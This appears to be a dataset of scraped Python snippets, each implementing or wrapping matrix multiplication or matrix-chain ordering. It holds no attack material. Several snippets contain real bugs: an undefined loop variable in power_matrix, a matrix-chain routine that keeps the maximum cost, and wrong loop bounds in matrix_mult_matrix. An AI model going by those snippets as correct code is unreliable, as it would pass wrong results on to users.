"def _multi_matmul_chain_order(arrays):\n n = len(arrays)\n # p stores the dimensions of the matrices\n # Example for p: A_{10x100}, B_{100x5}, C_{5x50} --> p = [10, 100, 5, 50]\n # Using -2 to generalize for shapes that are more than 2 dimmensions\n p = [a.shape[-2] for a in arrays] + [arrays[-1].shape[-1]]\n # m is a matrix of costs of the subproblems\n # m[i,j]: min number of scalar multiplications needed to compute A_{i..j}\n m = np.zeros((n, n), dtype=np.double)\n # s is the actual ordering\n # s[i, j] is the value of k at which we split the product A_i..A_j\n s = np.empty((n, n), dtype=np.intp)\n\n for l in range(1, n):\n for i in range(n - l):\n j = i + l\n m[i, j] = np.inf\n for k in range(i, j):\n q = m[i, k] + m[k + 1, j] + p[i] * p[k + 1] * p[j + 1]\n if q < m[i, j]:\n m[i, j] = q\n s[i, j] = k # Note that Cormen uses 1-based index\n return s",
"def lazy_matrix_mul(m_a, m_b):\n return np.dot(m_a, m_b)",
"def matmul():\n\n if RESULT_IN_NVRAM:\n matrix_c = ResultMatrixInDaos()\n else:\n matrix_c = ResultMatrixInMemory()\n\n # This could be trivially optimized by reordering indexes\n # and caching either a_block or b_block (assuming C in-memory).\n # *However* it would result in unfair comparisons with the \n # previous implementation used elsewhere.\n # Using the naive algorithm makes sense for a raw comparison.\n for i in range(MATRIXSIZE):\n for j in range(MATRIXSIZE):\n partial_result_block = np.zeros((BLOCKSIZE, BLOCKSIZE))\n\n for k in range(MATRIXSIZE):\n a_block = np.fromstring(\n DAOS_KV[\"A%02d%02d\" % (i, k)],\n dtype=NP_FROMSTRING_DTYPE\n ).reshape((BLOCKSIZE, BLOCKSIZE))\n\n b_block = np.fromstring(\n DAOS_KV[\"B%02d%02d\" % (k, j)],\n dtype=NP_FROMSTRING_DTYPE\n ).reshape((BLOCKSIZE, BLOCKSIZE))\n\n partial_result_block += a_block @ b_block\n \n matrix_c[i,j] = partial_result_block\n\n return matrix_c",
"def multiply_matrices(a, b):\n try:\n x = len(b[0])\n except:\n b = make_2D(b)\n try:\n x = len(a[0])\n except:\n a = make_2D(a)\n if len(a[0]) != len(b):\n print 'error: matrices cannot be multiplied'\n return\n out = np.zeros((len(a), len(b[0])))\n for i in range(len(out)):\n for j in range(len(out[0])):\n sum = 0\n for k in range(len(a[i])):\n sum += a[i][k] * b[k][j]\n out[i][j] = sum\n return out",
"def multiply_matrices(list):\n # Section 1: Start matrix product using 1st matrix in list\n matrix_product = list[0]\n\n # Section 2: Loop thru list to create product\n for matrix in list[1:]:\n matrix_product = matrix_multiply(matrix_product, matrix)\n\n return matrix_product",
"def mat_mul(mat1, mat2):\n\n if len(mat1[0]) == len(mat2):\n\n mat2 = matrix_transpose(mat2)\n response = []\n\n for row in range(len(mat1)):\n response.append(\n [\n sum(dot_product(mat1[row], mat2[column]))\n for column in range(len(mat2))\n ]\n )\n\n return response\n\n else:\n return None",
"def lazy_matrix_mul(m_a, m_b):\n return (np.matmul(m_a, m_b))",
"def Multiply(M1,M2):\r\n M3=[]\r\n w=0\r\n while w<len(M2[0]):\r\n tap=[]\r\n t=0\r\n while t<len(M2):\r\n tap.append(M2[t][w])\r\n t=t+1\r\n M3.append(tap)\r\n w=w+1\r\n M=[]\r\n # Multiplying matrices\r\n k=0\r\n sums=0\r\n while k<len(M1):\r\n j=0\r\n mpy=[]\r\n while j<len(M3):\r\n p=0\r\n sums=0\r\n while p<len(M3[j]):\r\n temp = (M1[k][p])*(M3[j][p])\r\n sums=sums+temp\r\n p=p+1\r\n mpy.append(sums)\r\n j=j+1\r\n M.append(mpy)\r\n k=k+1\r\n return M",
"def lazy_matrix_mul(m_a, m_b):\n m_a = np.array(m_a)\n m_b = np.array(m_b)\n\n return m_a.dot(m_b)",
"def matrix_mult_matrix(matrix_a, matrix_b):\n m = len(matrix_a)\n n = len(matrix_b)\n result = []\n matrix_b_t = transpose_matrix(matrix_b)\n for i in xrange(m):\n row = []\n\tfor j in xrange(m):\n row.append(dot_product(matrix_a[i], matrix_b_t[j]))\n\tresult.append(row)\n return result",
"def python_nonsquare_matrix_mult(matrix):\n\n transposed_matrix = np.zeros([matrix.shape[1],matrix.shape[0]])\n start = time.time()\n # for i in range(matrix.shape[0]):\n # for j in range(matrix.shape[1]):\n # transposed_matrix[j,i] = matrix[i,j]\n\n transposed_matrix = np.transpose(matrix)\n product = matrix.dot(transposed_matrix)\n\n # transposed_matrix = np.transpose(matrix)\n end = time.time()-start\n\n # print(\"Python Golden Transpose: %s\" % product)\n # print('python transpose time: %.2E' % end)\n return [product, end]",
"def lazy_matrix_mul(m_a, m_b):\n return np.matmul(np.array(m_a), np.array(m_b))",
"def __matmul__(self, q: np.ndarray) -> np.ndarray:\n return self.product(q)",
"def matrixMul(self, matrix, matrix2):\n matrix0 = matrix[:]\n matrix[0] = matrix0[0] * matrix2[0] + matrix0[2]*matrix2[1] # + matrix0[4]*0\n matrix[1] = matrix0[1] * matrix2[0] + matrix0[3]*matrix2[1] # + matrix0[5]*0\n matrix[2] = matrix0[0] * matrix2[2] + matrix0[2]*matrix2[3] # + matrix0[4]*0\n matrix[3] = matrix0[1] * matrix2[2] + matrix0[3]*matrix2[3] # + matrix0[5]*0\n matrix[4] = matrix0[0] * matrix2[4] + matrix0[2]*matrix2[5] + matrix0[4]\n matrix[5] = matrix0[1] * matrix2[4] + matrix0[3]*matrix2[5] + matrix0[5]",
"def __mul__(self, other):\n # \n # TODO - your code here\n #\n \n result = [];\n row_result = [];\n product = 0;\n \n if(self.w != other.h):\n raise(ValueError, \"Matrices can not multiply for their dimesion doesn't match\"); \n \n for row in self.g:\n row_result = [];\n for j in range(other.w):\n product = dot_product(row,other.get_column(j));\n row_result.append(product);\n result.append(row_result);\n \n return Matrix(result);",
"def mat_mul(mat1, mat2):\n\n rows1 = len(mat1)\n cols1 = len(mat1[0])\n rows2 = len(mat2)\n cols2 = len(mat2[0])\n\n if cols1 != rows2:\n return None\n else:\n new_matrix = []\n for x in range(rows1):\n aux_row = []\n for y in range(cols2):\n aux_sum = []\n for z in range(cols1):\n aux_sum.append(mat1[x][z] * mat2[z][y])\n aux_row.append(sum(aux_sum))\n new_matrix.append(aux_row)\n\n return new_matrix",
"def combine_one_matrices(mul):\n factor, args = mul.as_coeff_matrices()\n new_args = [args[0]]\n\n for B in args[1:]:\n A = new_args[-1]\n if not isinstance(A, OneMatrix) or not isinstance(B, OneMatrix):\n new_args.append(B)\n continue\n new_args.pop()\n new_args.append(OneMatrix(A.shape[0], B.shape[1]))\n factor *= A.shape[1]\n\n return newmul(factor, *new_args)",
"def mmultiply(self, matrix):\n try:\n result_matrix = [[0 for row in range(len(self.matrix))] for col in range(len(matrix[0]))]\n for i in range(len(self.matrix)):\n for j in range(len(matrix[0])):\n for k in range(len(matrix)):\n result_matrix[i][j] += self.matrix[i][k] * matrix[k][j]\n self.matrix = result_matrix\n except IndexError:\n pass\n pass",
"def square_matrix_multiply(a, b):\n n = len(a)\n c = [[0]*n for _ in range(n)]\n for i in range(n):\n for j in range(n):\n sm = 0\n for k in range(n):\n sm += (a[i][k] * b[k][j])\n c[i][j] = sm\n\n return c",
"def __mul__(self,m):\n if type(m) != Matrix:\n raise TypeError('The second argument is not a matrix lol')\n if self.ncols != m.nrows:\n raise ValueError('matrix dot argument has incorrect number of rows')\n new = Matrix(self.nrows,m.ncols)\n columns = m.getCols()\n rowindex = 0\n colindex = 0 \n for row in self.matrix:\n colindex = 0 \n for col in columns:\n summ = 0\n for i,j in zip(row,col):\n summ+= i*j \n new.matrix[rowindex][colindex] = summ\n print new.matrix\n colindex += 1 \n rowindex+=1\n return new",
"def matMul(a, b):\n sa=matShape(a)\n sb=matShape(b)\n if sa[1]!=sb[0]: raise ValueError\n ret=matZeros((sa[0],sb[1]))\n for i in range(sa[0]):\n for j in range(sb[1]):\n val=0.0\n for k in range(sa[1]):\n val+=matGet(a,i,k)*matGet(b,k,j)\n matSet(ret,i,j,val)\n return ret",
"def MatMulOrder(D):\r\n\tnum = len(D)-1 # number of matrix in the chain\r\n\tprint(f\"There are {num} matrix to multiply\")\r\n\tM = [[0 for _ in range(num)] for _ in range(num)]\r\n\tP = [[0 for _ in range(num)] for _ in range(num)]\r\n\r\n\t# i要从大到小\r\n\t# i == j时, M[i][j]=0,所以不用更新\r\n\t# i-th矩阵到j-th矩阵的乘的最优值初始化为inf\r\n\tfor i in range(num-2, -1, -1):\r\n\t\tfor j in range(i+1, num):\r\n\t\t\tM[i][j] = 100000000\r\n\t\t\tfor k in range(i, j):\r\n\t\t\t\tnew = M[i][k] + M[k+1][j] + D[i]*D[k+1]*D[j+1]\r\n\t\t\t\tif new < M[i][j]:\r\n\t\t\t\t\tM[i][j] = new \r\n\t\t\t\t\tP[i][j] = k\r\n\treturn M, P",
"def matrix_mult(A,B):\n\n m = len(A)\n p = len(B)\n n = len(B[0])\n AB = []\n for i in range(m):\n AB.append([])\n for j in range(n):\n total = 0\n for k in range(p):\n total += A[i][k] * B[k][j]\n AB[i].append(total)\n return AB",
"def __matmul__(self, csys):\n self._transform(csys)\n return self",
"def matrix_mult(m1, m2):\n output = []\n for rowIndex, row in enumerate(m1): #go through rows in m1\n new_row = []\n for columnIndex in range(len(m2[0])): #go through indices for each column of m2\n sum = 0\n for index3 in range(len(row)):\n product = m1[rowIndex][index3] * m2[index3][columnIndex]\n sum += product\n new_row.append(sum)\n output.append(new_row)\n return output\n \n \n #output = []\n #first for loop corresponds to the rows of my output matrix and loops through the rows of m1 (enumerate)\n #create an empty new row\n # second for loop, loops through columns of m2\n # create sum variable, initialize it with zero\n # third for loop, multiplies the index of the row in m1 times the index of the column in m2\n # add sum to product and assign this to the sum variable\n # append sum to new row\n # append new row to output\n # return output",
"def __matmul__(self, B):\n m, n = self.shape\n n_, r = B.shape\n assert n == n_, (\"Cannot multiply shapes \"\n \"({}, {}) and ({}, {})\".format(m, n, n_, r))\n mul_ = dict()\n # compute A_ik = sum_j A_ij*B_jk\n for i in range(m):\n for k in range(r):\n prod = mpfr(0)\n for j in range(n):\n prod += self[i, j] * B[j, k]\n mul_[i, k] = prod\n return MPMatrix((m, r), mul_)",
"def _multi_matmul(arrays, order, i, j, constant=False) -> Tensor:\n if i == j:\n return arrays[i]\n else:\n return matmul(\n _multi_matmul(arrays, order, i, order[i, j], constant),\n _multi_matmul(arrays, order, order[i, j] + 1, j, constant),\n constant,\n )",
"def __mul__(self, other):\n if self.n != other.m:\n raise TypeError(\"Illegal dimensions for mul operator\")\n tmp = [[0 for _ in xrange(self.n)] for _ in xrange(other.m)]\n for i in xrange(self.n):\n for j in xrange(other.m):\n for k in xrange(other.n):\n tmp[i][j] += self.values[i][k] * other.values[k][j]\n res = []\n for i in tmp:\n res += i\n return simplematrix(self.n, other.m, res)",
"def combine_powers(mul):\n factor, args = mul.as_coeff_matrices()\n new_args = [args[0]]\n\n for i in range(1, len(args)):\n A = new_args[-1]\n B = args[i]\n\n if isinstance(B, Inverse) and isinstance(B.arg, MatMul):\n Bargs = B.arg.args\n l = len(Bargs)\n if list(Bargs) == new_args[-l:]:\n new_args = new_args[:-l] + [Identity(B.shape[0])]\n continue\n\n if isinstance(A, Inverse) and isinstance(A.arg, MatMul):\n Aargs = A.arg.args\n l = len(Aargs)\n if list(Aargs) == args[i:i+l]:\n identity = Identity(A.shape[0])\n new_args[-1] = identity\n for j in range(i, i+l):\n args[j] = identity\n continue\n\n if A.is_square == False or B.is_square == False:\n new_args.append(B)\n continue\n\n if isinstance(A, MatPow):\n A_base, A_exp = A.args\n else:\n A_base, A_exp = A, S.One\n\n if isinstance(B, MatPow):\n B_base, B_exp = B.args\n else:\n B_base, B_exp = B, S.One\n\n if A_base == B_base:\n new_exp = A_exp + B_exp\n new_args[-1] = MatPow(A_base, new_exp).doit(deep=False)\n continue\n elif not isinstance(B_base, MatrixBase):\n try:\n B_base_inv = B_base.inverse()\n except NonInvertibleMatrixError:\n B_base_inv = None\n if B_base_inv is not None and A_base == B_base_inv:\n new_exp = A_exp - B_exp\n new_args[-1] = MatPow(A_base, new_exp).doit(deep=False)\n continue\n new_args.append(B)\n\n return newmul(factor, *new_args)",
"def matrix_mult(m1, m2):\n\ttemp = []\n\tfor i in range(len(m1)):\n\t\te = []\n\t\tfor j in range(len(m2[0])):\n\t\t\te.append(row_times_column(m1,i,m2,j))\n\t\ttemp.append(e)\n\treturn temp",
"def MultiplyMatrix(matrixA, matrixB):\r\n # result matrix initialized as singularity matrix\r\n result = [[0 for y in range(len(matrixB[0]))] for x in range(len(matrixA))]\r\n for i in range(len(matrixA)):\r\n # iterate through columns of Y\r\n for j in range(len(matrixB[0])):\r\n # iterate through rows of Y\r\n for k in range(len(matrixB)):\r\n result[i][j] += matrixA[i][k] * matrixB[k][j]\r\n return result",
"def matrix_chain_dynamic(dimensions, n):\n\n m = [[-1 for _ in range(n)] for _ in range(n)]\n s = [[0 for _ in range(n)] for _ in range(n)]\n\n # multiplying matrix by itself\n for i in range(1, n):\n m[i][i] = 0\n\n for length in range(2, n):\n for i in range(1, n - length + 1):\n j = i + length - 1\n for k in range(i, j):\n cost = m[i][k] + m[k + 1][j] + dimensions[i - 1] * dimensions[k] * dimensions[j]\n if cost > m[i][j]:\n m[i][j] = cost\n # index if splitting\n s[i][j] = k\n return m, s",
"def form_square_block_matrix(mat1,mat2):\n if mat1.cols==1:\n mat3 = mp.matrix(mat1.rows+mat2.rows,1)\n mat3[:mat1.rows] = mat1[:]\n mat3[mat1.rows:mat3.rows] = mat2[:]\n else:\n mat3 = mp.matrix(mat1.rows+mat2.rows, mat1.rows+mat2.rows)\n mat3[:mat1.rows,:mat1.rows] = mat1[:,:]\n mat3[mat1.rows:mat3.rows,mat1.rows:mat3.rows] = mat2[:,:]\n return mat3",
"def mul(self,mat1,mat2):\n if(isinstance(mat2,int)==True):\n result = [[mat1[i][j] * mat2 for j in range(len(mat1[0]))] for i in range(len(mat1))]\n self.out = result\n return self.out\n elif(len(mat1[0])==len(mat2)):\n result = [[sum(a*b for a,b in zip(i,j)) for j in zip(*mat2)] for i in mat1]\n self.out = result\n return self.out",
"def matmul(a, b):\n raise NotImplementedError",
"def matmul(xs: List[List[float]],\n ys: List[List[float]]) -> List[List[float]]:\n product = []\n for x_row in range(len(xs)):\n row = []\n for y_col in range(len(ys[0])):\n col = [ys[y_row][y_col] for y_row in range(len(ys))]\n row.append(Math.dot(xs[x_row], col))\n product.append(row)\n return product",
"def multiply_matrices(A, B):\n # Section 1: Ensure A & B dimensions are correct for multiplication\n rowsA = len(A)\n colsA = len(A[0])\n rowsB = len(B)\n colsB = len(B[0])\n if colsA != rowsB:\n raise ArithmeticError(\n 'Number of A columns must equal number of B rows.')\n\n # Section 2: Store matrix multiplication in a new matrix\n C = zeros_matrix(rowsA, colsB)\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C",
"def multiM(*args):\r\n filas_1,filas_2 = len(args[0]),len(args[1])\r\n columnas_1,columnas_2 = len(args[0][0]),len(args[1][0])\r\n matriz_r = []\r\n for k in range(filas_1):\r\n matriz_r.append([0]*columnas_2)\r\n for i in range(columnas_2):\r\n matriz_r[k][i] = 0\r\n for i in range(filas_1):\r\n for j in range(columnas_1):\r\n for k in range(columnas_2):\r\n matriz_r[i][k] = matriz_r[i][k] + args[0][i][j] * args[1][j][k]\r\n return matriz_r",
"def __matmul__(self, tensor):\n return self.matmul(tensor)",
"def test_matrix_product(self, use_cache):\n\n key = jrandom.PRNGKey(0)\n dim = 50\n max_power = 25\n\n matrix = jrandom.normal(key, (dim, dim)) / 10\n vector = jnp.ones((dim,), dtype=jnp.float32)\n\n if use_cache:\n mpstate = model_utils.CachedMatrixPowerState.precompute(matrix, max_power)\n else:\n mpstate = model_utils.LazyMatrixPowerState(matrix)\n\n for t in range(max_power):\n result = mpstate.matrix_power_multiply(vector, t)\n expected = np.linalg.matrix_power(matrix, t) @ vector\n\n np.testing.assert_array_almost_equal(result, expected, decimal=1)",
"def __mul__(self, other):\r\n T = type(other)\r\n # mat4*scalar\r\n if T==types.FloatType or T==types.IntType or T==types.LongType:\r\n return mat4(map(lambda x,other=other: x*other, self.mlist))\r\n # mat4*vec3\r\n if isinstance(other, _vec3):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n w = float(m41*other.x + m42*other.y + m43*other.z + m44)\r\n return _vec3(m11*other.x + m12*other.y + m13*other.z + m14, \r\n m21*other.x + m22*other.y + m23*other.z + m24, \r\n m31*other.x + m32*other.y + m33*other.z + m34)/w\r\n # mat4*vec4\r\n if isinstance(other, _vec4):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n return _vec4(m11*other.x + m12*other.y + m13*other.z + m14*other.w, \r\n m21*other.x + m22*other.y + m23*other.z + m24*other.w, \r\n m31*other.x + m32*other.y + m33*other.z + m34*other.w,\r\n m41*other.x + m42*other.y + m43*other.z + m44*other.w)\r\n # mat4*mat4\r\n if isinstance(other, mat4):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n n11,n12,n13,n14,n21,n22,n23,n24,n31,n32,n33,n34,n41,n42,n43,n44 = other.mlist\r\n return mat4( m11*n11+m12*n21+m13*n31+m14*n41,\r\n m11*n12+m12*n22+m13*n32+m14*n42,\r\n m11*n13+m12*n23+m13*n33+m14*n43,\r\n m11*n14+m12*n24+m13*n34+m14*n44,\r\n\r\n m21*n11+m22*n21+m23*n31+m24*n41,\r\n m21*n12+m22*n22+m23*n32+m24*n42,\r\n m21*n13+m22*n23+m23*n33+m24*n43,\r\n m21*n14+m22*n24+m23*n34+m24*n44,\r\n\r\n m31*n11+m32*n21+m33*n31+m34*n41,\r\n m31*n12+m32*n22+m33*n32+m34*n42,\r\n m31*n13+m32*n23+m33*n33+m34*n43,\r\n m31*n14+m32*n24+m33*n34+m34*n44,\r\n\r\n m41*n11+m42*n21+m43*n31+m44*n41,\r\n m41*n12+m42*n22+m43*n32+m44*n42,\r\n m41*n13+m42*n23+m43*n33+m44*n43,\r\n m41*n14+m42*n24+m43*n34+m44*n44)\r\n # unsupported\r\n else:\r\n raise TypeError, \"unsupported operand type for *\"",
"def matrixMultiplication(firstMatrix, secondMatrix):\n if len(firstMatrix[0]) == len(secondMatrix): # Checks whether the matrices can be multiplied or not or not\n finalMatrix = []\n for y in range(len(firstMatrix)): # 2\n currentMatrix = []\n for i in range(len(secondMatrix[0])):\n currentSum = 0\n for j in range(len(secondMatrix)):\n currentSum += secondMatrix[j][i] * firstMatrix[y][j]\n currentMatrix.append(currentSum)\n print(\"This is my current matrix: \" + str(currentMatrix))\n finalMatrix.append(currentMatrix)\n print(\"This product of the two matrices is :) \" + str(finalMatrix))\n else:\n print(\"This operation cannot be done, make sure the rows of the first matrix is the same as the number of columns in the second matrix\")",
"def matrix_multiply(A,B):\n rowsA = len(A)\n colsA = len(A[0])\n\n rowsB = len(B)\n colsB = len(B[0])\n\n if colsA != rowsB:\n raise ArithmeticError('Number of A columns must equal number of B rows.')\n\n C = zeros_matrix(rowsA, colsB)\n\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C",
"def matrixMul(a, b):\n # Initializing Empty Matrix\n c = [[0, 0], [0, 0]]\n # 2x2 matrix multiplication. Essentially O(1)\n for i in range(2):\n for j in range(2):\n for k in range(2):\n c[i][j] = (c[i][j] + (a[i][k] * b[k][j]))\n\n # Returning the products\n return c",
"def _matmult(A, x):\n b = []\n for a in A:\n b.append(sum([ai * xi for ai, xi in zip(a, x)]))\n return b",
"def matrix_mul(m_a, m_b):\n rows_a = 0\n cols_a = 0\n rows_b = 0\n cols_b = 0\n if type(m_a) is not list:\n raise TypeError(\"m_a must be a list\")\n if type(m_b) is not list:\n raise TypeError(\"m_b must be a list\")\n length = []\n for row in m_a:\n if type(row) is not list:\n raise TypeError(\"m_a must be a list of lists\")\n for row in m_b:\n if type(row) is not list:\n raise TypeError(\"m_b must be a list of lists\")\n if m_a == [] or m_a == [[]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b == [] or m_b == [[]]:\n raise ValueError(\"m_b can't be empty\")\n for row in m_a:\n cols_a = 0\n for elem in row:\n if type(elem) is not int and type(elem) is not float:\n raise TypeError(\"m_a should contain only integers or floats\")\n cols_a += 1\n for row in m_b:\n cols_b = 0\n for elem in row:\n if type(elem) is not int and type(elem) is not float:\n raise TypeError(\"m_b should contain only integers or floats\")\n cols_b += 1\n for row in m_a:\n length.append(len(row))\n rows_a += 1\n if not len(set(length)) <= 1:\n raise TypeError(\"each row of m_a must be of the same size\")\n length.clear()\n for row in m_b:\n length.append(len(row))\n rows_b += 1\n if not len(set(length)) <= 1:\n raise TypeError(\"each row of m_b must be of the same size\")\n if cols_a != rows_b:\n raise ValueError(\"m_a and m_b can't be multiplied\")\n new = [[0 for i in range(cols_b)] for j in range(rows_a)]\n for new_rows in range(rows_a):\n for new_cols in range(cols_b):\n for i in range(cols_a):\n new[new_rows][new_cols] += m_a[new_rows][i] * m_b[i][new_cols]\n return new",
"def _kronecker_product(mat1: tf.Tensor, mat2: tf.Tensor) -> tf.Tensor:\n m1, n1 = mat1.get_shape().as_list()\n mat1_rsh = tf.reshape(mat1, [m1, 1, n1, 1])\n m2, n2 = mat2.get_shape().as_list()\n mat2_rsh = tf.reshape(mat2, [1, m2, 1, n2])\n return tf.reshape(mat1_rsh * mat2_rsh, [m1 * m2, n1 * n2])",
"def _mul(*args):\n\treturn functools.reduce(numpy.dot, args)",
"def matrix_mul(m_a, m_b):\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if len(list(filter(lambda i: not isinstance(i, list), m_a))) > 0:\n raise TypeError(\"m_a must be a list of lists\")\n if len(list(filter(lambda i: not isinstance(i, list), m_b))) > 0:\n raise TypeError(\"m_b must be a list of lists\")\n if m_a is None or m_a == [] or m_a == [[]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b is None or m_b == [] or m_b == [[]]:\n raise ValueError(\"m_b can't be empty\")\n for r in m_a:\n for v in r:\n if not isinstance(v, (int, float)):\n raise ValueError(\"m_a should contain only integers or floats\")\n for r in m_b:\n for v in r:\n if not isinstance(v, (int, float)):\n raise ValueError(\"m_b should contain only integers or floats\")\n if max(map(lambda i: len(i), m_a)) != min(map(lambda i: len(i), m_a)):\n raise TypeError(\"each row of m_a must be of the same size\")\n if max(map(lambda i: len(i), m_b)) != min(map(lambda i: len(i), m_b)):\n raise TypeError(\"each row of m_b must be of the same size\")\n try:\n w = (len(m_a) + (0, 1)[len(m_a) == 1])\n m_c = [(['x'] * w) for b in range(len(m_b[0]))]\n for i in range(len(m_a)):\n for j in range(len(m_b[0])):\n s = 0\n for k in range(len(m_a[0])):\n s += (m_a[i][k] * m_b[k][j])\n m_c[i][j] = s\n return list(filter(lambda r: r != (['x'] * w), m_c))\n except:\n raise ValueError(\"m_a and m_b can't be multiplied\")",
"def __mul__(left, right):\n \n if isinstance(left, Plucker) and isinstance(right, Plucker):\n # reciprocal product\n return np.dot(left.uw, right.v) + np.dot(right.uw, left.v)\n elif isinstance(left, Plucker) and arg.ismatrix(right, (4,None)):\n return left.skew @ right; # postmultiply by 4xN",
"def matrixMultiply(a, colsA, b, colsB):\r\n\trowsA = len(a)\r\n\trowsB = len(b)\r\n\r\n\t# rowsA x colsA ... rowsB x colsB \r\n\tassert rowsA == colsB, \"matrix dimensions not fit for multiplication\"\r\n\r\n\t# result size: rowsA x colsB\r\n\tr = rowsA * [None]\r\n\tfor i in range(rowsA):\r\n\t\tr[i] = colsB * [None]\r\n\t\tfor j in range(colsB):\r\n\t\t\t\tr[i][j] = sum( a[i][k]* b[k][j] for k in range(colsA))\r\n\treturn r",
"def StrassenMatrixM(a, b):\r\n if len(a) != 2 or len(a[0]) != 2 or len(b) != 2 or len(b[0]) != 2:\r\n raise Exception('Matrices should be 2x2!')\r\n print(a[0][0] * b[0][1] + a[0][1] * b[1][1])\r\n matrix = [[a[0][0] * b[0][0] + a[0][1] * b[1][0], a[0][0] * b[0][1] + a[0][1] * b[1][1]],\r\n [a[1][0] * b[0][0] + a[1][1] * b[1][0], a[1][0] * b[0][1] + a[1][1] * b[1][1]]]\r\n\r\n return matrix",
"def matmul(A, B):\n\n A._check('*', B, A.shape[1], B.shape[0])\n return A.from_rep(A.rep.matmul(B.rep))",
"def __matmul__(self, other):\n return F.MatMul.apply(self, other)",
"def matrix_product(mat1: List[List[int]], mat2: List[List[int]]):\n if len(mat1) == 0 or len(mat2) == 0:\n raise ValueError(\"One of matrix is empty\")\n n, k1 = len(mat1), len(mat1[0])\n k2, m = len(mat2), len(mat2[0])\n if k1 != k2:\n raise ValueError(\n f\"Can't multiply two matrices with shapes {n}x{k1} and {k2}x{m}\"\n )\n mat2_t = matrix_transpose(mat2)\n return [[vec_product(vec1, vec2) for vec2 in mat2_t] for vec1 in mat1]",
"def transforms_multiply(t0s, t1s):\r\n \r\n return ut.matrix_multiply(t0s, t1s)",
"def matrix_multiplication_loop(x_matrix, y_matrix):\n result = []\n for i, row in enumerate(x_matrix):\n row_vector = []\n for j in range(len(y_matrix[0])):\n product = 0\n for k in range(len(row)):\n product += x_matrix[i][k] * y_matrix[k][j]\n row_vector.append(product)\n result.append(row_vector)\n return result",
"def matrixMultiplication(self, n, id, context):\n\n print(\"id: {}\".format(id))\n # Create one matrix\n f = 1\n m1 = []\n for x in range(n):\n row = []\n for y in range(n):\n row.append(f)\n f = f + 1\n m1.append(row)\n # The second matrix is equal to the first matrix\n m2 = m1\n print(\"m2: {}\".format(m2))\n\n # Multiply matrices\n m3 = []\n for i in range(n):\n row = []\n for j in range(n):\n sum = 0\n for k in range(n):\n sum = sum + m1[i][k] * m2[k][j]\n row.append(sum)\n m3.append(row)\n\n sum = 0\n # add the entries\n for i in range(n):\n for j in range(n):\n sum = sum + m3[i][j]\n\n print(\"Result of multiplication is {}\".format(sum))\n return sum",
"def matmul(x, y):\n return np.matmul(x, y)",
"def calculate_matmul(mat_a, mat_b):\n assert mat_a.shape[-2] == 1 and mat_b.shape[-1] == 1\n return tf.reduce_sum(tf.squeeze(mat_a, -2) * tf.squeeze(mat_b, -1), axis=2, keepdims=True)",
"def matrix_multiply(x, y):\r\n\r\n # handle the base case of receiving\r\n # two empty matrices\r\n if x == [] and y == []:\r\n return []\r\n\r\n # determine the number of rows and columns in the result matrix\r\n num_rows = len(x)\r\n num_cols = len(y[0])\r\n\r\n num_cross = len(x[0])\r\n\r\n # initialize the result matrix\r\n result_matrix = [[0] * num_cols for _ in xrange(num_rows)]\r\n\r\n # compute the values for each cell of the result\r\n # matrix\r\n for row_index in xrange(num_rows):\r\n for col_index in xrange(num_cols):\r\n\r\n # sum up the corresponding values from\r\n # x and y\r\n for multiplication_index in xrange(num_cross):\r\n\r\n x_value = x[row_index][multiplication_index]\r\n y_value = y[multiplication_index][col_index]\r\n\r\n result_matrix[row_index][col_index] += x_value * y_value\r\n\r\n return result_matrix",
"def kronecker_product(mat1, mat2):\n m1, n1 = mat1.get_shape().as_list()\n mat1_rsh = tf.reshape(mat1, [m1, 1, n1, 1])\n m2, n2 = mat2.get_shape().as_list()\n mat2_rsh = tf.reshape(mat2, [1, m2, 1, n2])\n return tf.reshape(mat1_rsh * mat2_rsh, [m1 * m2, n1 * n2])",
"def __mul__(self, other):\n if isinstance(other, Vector):\n # Matrix vector product\n v = Vector(list())\n for n in range(len(other.vectors)):\n v += scale(other.vectors[n][n], self.vectors[n])\n return v\n elif isinstance(other, Matrix):\n # Matrix matrix product\n if self.n != other.m:\n raise ValueError(\"Wrong fucking sizes, nøøb\")\n\n selfVectors = self.vectors\n selfColVectors = self.transpose()\n otherVectors = other.vectors\n otherColVectors = other.transpose()\n vectors = list()\n for col in range(other.n):\n cordinator = []\n\n for row in range(self.m):\n coord = 0\n\n for k in range(other.m):\n coord += (\n selfVectors[row].coords[k]\n * otherColVectors.vectors[col].coords[k]\n )\n\n cordinator.append(coord)\n\n v = Vector(cordinator)\n vectors.append(v)\n matrix = Matrix(vectors)\n matrix = matrix.transpose()\n return matrix\n elif isinstance(other, int) or isinstance(other, float): # Skalering af matrix\n for i in range(len(self.vectors)):\n self.vectors[i] *= other\n else:\n raise ValueError(\n \"Can only multiply Matrix with Matrix, Vector, Integer or Float\"\n )",
"def multiply(a, b):\n columns_of_a = len(a[0])\n lines_of_b = len(b)\n if columns_of_a != lines_of_b:\n # Check matrix dimensions\n print \"Incompatible sizes!\"\n else:\n lines_of_a = len(a)\n columns_of_b = len(b[0])\n #C = []\n #for i in range (lines_of_a):\n # C.append(columns_of_b * [0])\n c = [columns_of_b * [0] for i in range(lines_of_a)]\n for i in range(lines_of_a):\n for j in range(columns_of_b):\n for k in range(lines_of_b):\n c[i][j] += a[i][k] * b[k][j]\n return c",
"def power_matrix(A, k):\n nrow = np.shape(A)[0]\n A0 = np.identity(nrow) \n for k in range(q):\n A0 = np.dot(A0, A)\n \n return A0",
"def __mul__(self, other):\n return Matrix3(\n self.i * other,\n self.j * other,\n self.k * other,\n )",
